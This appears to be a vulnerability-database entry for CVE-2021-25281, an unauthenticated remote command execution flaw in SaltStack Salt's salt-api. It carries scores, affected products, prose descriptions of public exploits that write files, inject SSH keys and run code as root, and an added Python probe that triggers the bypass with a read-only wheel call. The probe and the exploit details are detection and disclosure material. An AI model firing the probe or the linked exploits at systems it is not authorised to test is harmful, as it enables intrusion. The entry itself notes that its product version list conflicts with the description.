CVE-2021-25281

CRITICAL EXPLOITED NUCLEI

SaltStack Salt < 3002.5 - Unauthenticated Remote Command Execution via wheel_async Client

Title source: llm

Exploitation Summary

CVE-2021-25281 has been observed exploited in the wild (reported by VulnCheck KEV). EIP tracks 2 public exploits: a proof of concept from Immersive-Labs-Sec, and the Metasploit module exploits/linux/http/saltstack_salt_wheel_async_rce by Alex Seymour and Christophe De La Fuente. A Nuclei detection template is also available. Note that the CISA SSVC vulnrichment record below still lists Exploitation: none, so the in-the-wild status rests on the VulnCheck KEV entry.

AI-analyzed exploit summary: the public PoC chains the wheel_async authentication bypass with directory traversal in the master's file-writing wheel functionality (tracked separately as CVE-2021-25282) to write arbitrary files on the Salt master and, from there, reach remote code execution.

Description

An issue was discovered in SaltStack Salt before 3002.5. salt-api does not honor eauth credentials for the wheel_async client, so the credential check applied to the synchronous wheel client is skipped for asynchronous wheel calls. Thus, an attacker with network access to salt-api can remotely run any wheel module on the master without authenticating.
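The following is an added example, not code from this page, the Nuclei template, or the Salt project: a non-destructive probe for the behaviour described above. It sends the salt-api /run lowstate for the wheel_async client with no eauth, username or password, calling the read-only wheel function key.list_all (an assumption: any harmless wheel function would do), and classifies the response. A 200 whose return list carries a job id and a salt/wheel/<jid> tag means the master queued a wheel job for an unauthenticated caller. The "patched" branch assumes that a master which honours eauth refuses the request with 401 or an error without a jid; the sample responses are constructed, not captured.

```python
"""Unauthenticated wheel_async probe for CVE-2021-25281 (added example).

Calls a read-only wheel function only; it writes no files and runs no
commands on the master. All sample responses below are constructed.
"""
import json
import ssl
import urllib.error
import urllib.request

# Read-only wheel function used as the probe payload (assumption: any
# harmless wheel function gives the same signal).
PROBE_FUN = "key.list_all"


def build_lowstate(client: str, fun: str = PROBE_FUN) -> dict:
    """Lowstate for POST /run. Deliberately carries no eauth/username/password:
    on a vulnerable master the 'wheel_async' client is not credential-checked,
    while the synchronous 'wheel' client with the same body should be refused."""
    return {"client": client, "fun": fun}


def classify_response(status: int, body: str) -> str:
    """Classify a /run response.

    'vulnerable': HTTP 200 and a queued wheel job (jid + 'salt/wheel/<jid>' tag),
                  i.e. the master ran the wheel call without credentials.
    'patched'   : non-200, or a 200 without a queued job (assumption about how a
                  master that honours eauth answers an unauthenticated lowstate).
    'unknown'   : 200 with a body that is not JSON.
    """
    if status != 200:
        return "patched"
    try:
        data = json.loads(body)
    except ValueError:
        return "unknown"
    if not isinstance(data, dict):
        return "patched"
    for item in data.get("return", []):
        if (
            isinstance(item, dict)
            and item.get("jid")
            and str(item.get("tag", "")).startswith("salt/wheel/")
        ):
            return "vulnerable"
    return "patched"


def probe(base_url: str, verify_tls: bool = True, timeout: float = 10.0) -> str:
    """POST the wheel_async lowstate to <base_url>/run (salt-api, default port 8000)
    and classify the answer. base_url is e.g. 'https://salt-master:8000' (assumed)."""
    req = urllib.request.Request(
        base_url.rstrip("/") + "/run",
        data=json.dumps(build_lowstate("wheel_async")).encode(),
        headers={"Content-Type": "application/json", "Accept": "application/json"},
        method="POST",
    )
    # rest_cherrypy commonly runs with a self-signed certificate in labs.
    ctx = None if verify_tls else ssl._create_unverified_context()
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            return classify_response(resp.status, resp.read().decode(errors="replace"))
    except urllib.error.HTTPError as err:
        return classify_response(err.code, err.read().decode(errors="replace"))


# Constructed sample responses (not captured from a real master).
SAMPLE_VULNERABLE = json.dumps(
    {"return": [{"tag": "salt/wheel/20210301120000000000",
                 "jid": "20210301120000000000"}]}
)
SAMPLE_REFUSED_STATUS = 401
SAMPLE_REFUSED_BODY = ""

if __name__ == "__main__":
    print("constructed vulnerable sample ->", classify_response(200, SAMPLE_VULNERABLE))
    print("constructed refused sample    ->",
          classify_response(SAMPLE_REFUSED_STATUS, SAMPLE_REFUSED_BODY))
```

Run probe("https://salt-master:8000", verify_tls=False) against a master you are authorised to test. Sending build_lowstate("wheel") with the same empty credentials is a useful control: that client is expected to be refused on both vulnerable and patched masters, so a jid coming back only for wheel_async isolates this bug. The queued job's own output is not in the HTTP response (it goes to the master's job cache and event bus), so the jid/tag is the only signal to key on.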

Exploits (2)

nomisec · WORKING POC · 27 stars
by Immersive-Labs-Sec · poc
https://github.com/Immersive-Labs-Sec/CVE-2021-25281

This repository contains a functional exploit for CVE-2021-25281. It chains the wheel_async authentication bypass with directory traversal in SaltStack's file-writing wheel functionality (CVE-2021-25282) to achieve arbitrary file write on the master and, from that, remote code execution. The exploit includes multiple modes: writing arbitrary files, creating state files for command execution, and injecting SSH keys.

Classification
Working Poc 100%
Attack Type
RCE
Complexity
Moderate
Reliability
Reliable
Target: SaltStack Salt
No auth needed
Prerequisites: Network access to the Salt master · Salt master running a vulnerable version
devstral-2 · analyzed Feb 18, 2026
metasploit · WORKING POC · EXCELLENT
by Alex Seymour, Christophe De La Fuente · ruby · poc · unix
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/saltstack_salt_wheel_async_rce.rb

This Metasploit module exploits an authentication bypass (CVE-2021-25281) and directory traversal (CVE-2021-25282) in SaltStack Salt's REST API to achieve unauthenticated remote code execution as root. It leverages the maintenance process check to execute a malicious Python script placed in the Extension Module directory.

Classification
Working Poc 100%
Attack Type
RCE
Complexity
Moderate
Reliability
Reliable
Target: SaltStack Salt (versions 3002.2, 3001.4, 3000.6, and earlier)
No auth needed
Prerequisites: Network access to the Salt API (default port 8000) · Salt API service running with default or vulnerable configuration
devstral-2 · analyzed Feb 19, 2026

Nuclei Templates (1)

SaltStack Salt <3002.5 - Auth Bypass
CRITICAL · by madrobot

Scores

CVSS v3 9.8
EPSS 0.9385
EPSS Percentile 99.9%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CISA SSVC

Vulnrichment
Exploitation none
Automatable yes
Technical Impact total

Details

VulnCheck KEV 2026-01-14
CWE
CWE-287
Status published
Products (8) (note: the saltstack/salt and pypi/salt ranges listed here do not match the affected range stated in the description, Salt before 3002.5; treat the description as authoritative for version checks)
debian/debian_linux 9.0
debian/debian_linux 10.0
debian/debian_linux 11.0
fedoraproject/fedora 32
fedoraproject/fedora 33
fedoraproject/fedora 34
pypi/salt 0 - 2015.8.13 (PyPI)
saltstack/salt < 2015.8.10
Published Feb 27, 2021
Tracked Since Feb 18, 2026